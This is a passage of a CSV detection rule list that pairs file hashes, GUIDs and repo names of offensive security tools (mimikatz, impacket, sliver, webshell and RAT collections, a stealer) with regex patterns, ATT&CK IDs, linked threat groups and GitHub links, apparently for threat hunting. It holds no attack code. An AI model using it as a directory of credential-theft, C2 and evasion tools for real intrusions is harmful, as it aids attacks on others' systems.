"*9ec223a7538868ec25a3823217038beedef36d8dd1f8e388c056bf79fd864b93*",".{0,1000}9ec223a7538868ec25a3823217038beedef36d8dd1f8e388c056bf79fd864b93.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","#filehash","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","32025" 
"*9ec78bce4a3ae1586e4bddd8e8becde6f7277b3a63205e3043a175e996c96175*",".{0,1000}9ec78bce4a3ae1586e4bddd8e8becde6f7277b3a63205e3043a175e996c96175.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32026" "*9ECA7D150BA4BF6458ECA88EC6083DDEE2113202C68D07F6E7BC521333D0CE10*",".{0,1000}9ECA7D150BA4BF6458ECA88EC6083DDEE2113202C68D07F6E7BC521333D0CE10.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32028" "*9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d*",".{0,1000}9ecca3b6c787675d74bbfaa0e3ded77d448a0de4fe51c3c29c07cf3b04b8b71d.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","#filehash","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","32030" "*9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be*",".{0,1000}9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32031" "*9EDF1E70CDCE89E9AE400305C24CD202EC348D38E464F61180D509C5AF569CB3*",".{0,1000}9EDF1E70CDCE89E9AE400305C24CD202EC348D38E464F61180D509C5AF569CB3.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","32033" "*9EE27D63-6AC9-4037-860B-44E91BAE7F0D*",".{0,1000}9EE27D63\-6AC9\-4037\-860B\-44E91BAE7F0D.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","#GUIDproject","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","32035" "*9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82*",".{0,1000}9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32036" "*9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77*",".{0,1000}9ef20604a95558331dc4bed09434f69c6b18f2916ed27245fe77742aafaa2e77.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - 
TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32037" "*9ef4e3284e5ffe762b6e18d341a1a9e3400e5cd76241d6ef0af77103119c3515*",".{0,1000}9ef4e3284e5ffe762b6e18d341a1a9e3400e5cd76241d6ef0af77103119c3515.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32038" "*9ef956d02a750d02229c4e150795d0d5b6c603b9af7b6bc4bb24f9c9dc21a630*",".{0,1000}9ef956d02a750d02229c4e150795d0d5b6c603b9af7b6bc4bb24f9c9dc21a630.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32040" "*9efacd75bddef7424cbce62a44bb6f94e7015af799301f19da01c6ea72fb2481*",".{0,1000}9efacd75bddef7424cbce62a44bb6f94e7015af799301f19da01c6ea72fb2481.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32041" "*9EFFFF7A-DC03-4D52-BB8F-F0140FAD26E7*",".{0,1000}9EFFFF7A\-DC03\-4D52\-BB8F\-F0140FAD26E7.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 
- T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","32043" "*9emin1/charlotte*",".{0,1000}9emin1\/charlotte.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","32044" "*9f0a2fc2267823c55250c5036b3555e8e707ac274252a8c9fd18e521c8e66287*",".{0,1000}9f0a2fc2267823c55250c5036b3555e8e707ac274252a8c9fd18e521c8e66287.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32045" "*9f10e67d819156bec13f1a307df49dcf21bd91ddff45205818e402899e58ccca*",".{0,1000}9f10e67d819156bec13f1a307df49dcf21bd91ddff45205818e402899e58ccca.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","32046" "*9f1186262760c8424674045530bb64d541acbd5a5364e5e56f23cae01243a59e*",".{0,1000}9f1186262760c8424674045530bb64d541acbd5a5364e5e56f23cae01243a59e.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/WKL-Sec/dcomhijack","1","0","#filehash","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","32047" "*9f17e90125023767fcb54bc9573f20b89a50772134e502f92832b6b00df68768*",".{0,1000}9f17e90125023767fcb54bc9573f20b89a50772134e502f92832b6b00df68768.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","32048" "*9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69*",".{0,1000}9f1853b2b8ee03b428bfcad0502959b2a00761471599e3db4c86ab9550df9b69.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","32049" "*9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21*",".{0,1000}9f19635e335acf9c73acaa6754d100215f3a14a5dfb656abf9dd416237dd3b21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32050" "*9f1af0a9b870f562131c2dbb25a3fe416512b0d74b7e57a0f2dcc4b7039383bd*",".{0,1000}9f1af0a9b870f562131c2dbb25a3fe416512b0d74b7e57a0f2dcc4b7039383bd.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data 
Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","32051" "*9f25b9fee359a51b7ab3ac889decc51cdec9dcbeffb57a3e2001b9dd263062f1*",".{0,1000}9f25b9fee359a51b7ab3ac889decc51cdec9dcbeffb57a3e2001b9dd263062f1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32055" "*9f25da71d888618eb41ff007df64538c1f9a81a717701e66481ef9b14394e09d*",".{0,1000}9f25da71d888618eb41ff007df64538c1f9a81a717701e66481ef9b14394e09d.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","#filehash","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","32056" "*9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e*",".{0,1000}9f299bf02ff7ee91ee018f04d40911db1d133bca6a38d3bf318ef9e51e91f71e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32058" "*9f2cef78b9133cc32d8ef9bb370a0fc73b8bc6a8182519b0715163a816c953ab*",".{0,1000}9f2cef78b9133cc32d8ef9bb370a0fc73b8bc6a8182519b0715163a816c953ab.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered 
Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","32062" "*9f35e54b759b872926a8564d1b39f763a5a25015c70d401ed5f8acbe1fefe632*",".{0,1000}9f35e54b759b872926a8564d1b39f763a5a25015c70d401ed5f8acbe1fefe632.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32063" "*9f3c1c73211ccb972f9d7e94a2130223cab43ffc7150ff432d1dafbb4a080eaf*",".{0,1000}9f3c1c73211ccb972f9d7e94a2130223cab43ffc7150ff432d1dafbb4a080eaf.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","32064" "*9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db*",".{0,1000}9f42af7c49f77e716869186e182bee63348dd63dc9f407e08f0ff930a5e5b9db.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","32065" 
"*9f4885b3b55f370d05e9426ba900cfa8daaa785129d6d80e576d16e4d497f6c8*",".{0,1000}9f4885b3b55f370d05e9426ba900cfa8daaa785129d6d80e576d16e4d497f6c8.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#filehash","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","32066" "*9f5c55028eb0ffa7dca229018a3fd7bd9eb5866449245910cce6f2695cec37d3*",".{0,1000}9f5c55028eb0ffa7dca229018a3fd7bd9eb5866449245910cce6f2695cec37d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32068" "*9F5CF56A-DDB2-4F40-AB99-2A1DC47588E1*",".{0,1000}9F5CF56A\-DDB2\-4F40\-AB99\-2A1DC47588E1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32069" "*9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f*",".{0,1000}9f63e35d7b9d0814ad9f0ef23b89deb4f823d3b07bcd33df9abc5b957bb8be0f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32071" "*9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0*",".{0,1000}9f65528998b39f2e7239f89a56ded47ea865eea2d6b82b300cd5de7e62072cf0.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","32072" "*9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a*",".{0,1000}9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32073" "*9f6b1665f8bb3a07f8b63b31944376f3e92254dde22cfc4136e3be206b54cabe*",".{0,1000}9f6b1665f8bb3a07f8b63b31944376f3e92254dde22cfc4136e3be206b54cabe.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","32074" "*9f7accb636102b4d0ca9242739c24ae59e5eec9b8049db3c0149a9287fdb5373*",".{0,1000}9f7accb636102b4d0ca9242739c24ae59e5eec9b8049db3c0149a9287fdb5373.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - 
TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32080" "*9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514*",".{0,1000}9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32081" "*9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514*",".{0,1000}9f7bb583f87b8cfc56d4319cdcfeb865c0db77a0f2110f87d5c694c7f7a0e514.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - 
TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32082" "*9f7f5e0e8a05792800e0c53e361607df2359b6f1d21eba33d124ff44046946b9*",".{0,1000}9f7f5e0e8a05792800e0c53e361607df2359b6f1d21eba33d124ff44046946b9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32083" "*9f8ba7d3f6abf2e98e5ec5e0257b65907a5f66b2d28ef80df212c347faaf1179*",".{0,1000}9f8ba7d3f6abf2e98e5ec5e0257b65907a5f66b2d28ef80df212c347faaf1179.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32085" 
"*9f8e72805e95575c9875ba19a32fd3506c662883e35afd58bf7ac9c15e4088c2*",".{0,1000}9f8e72805e95575c9875ba19a32fd3506c662883e35afd58bf7ac9c15e4088c2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32086" "*9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155*",".{0,1000}9f9039910ee089cd67d3771229526bdab9171ab559d73c2f97bd25da459c6155.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32087" "*9f9141f57f4d135a00557547091b73f9b13b0af2346082a243e65af90cb9be7e*",".{0,1000}9f9141f57f4d135a00557547091b73f9b13b0af2346082a243e65af90cb9be7e.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","32088" 
"*9f93b709333b6a86108d0df9a408356389f6f619bc4ef5562c7478d203c9d956*",".{0,1000}9f93b709333b6a86108d0df9a408356389f6f619bc4ef5562c7478d203c9d956.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32089" "*9f946bd0783019a56d2a6de29dd7a2ae1a2b62239396a99eca83b17e4010fc0d*",".{0,1000}9f946bd0783019a56d2a6de29dd7a2ae1a2b62239396a99eca83b17e4010fc0d.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","32090" "*9f9587864f9b2929cf6af970170d36915110feb1e4c772529b8aa52e5b563d3a*",".{0,1000}9f9587864f9b2929cf6af970170d36915110feb1e4c772529b8aa52e5b563d3a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","32091" 
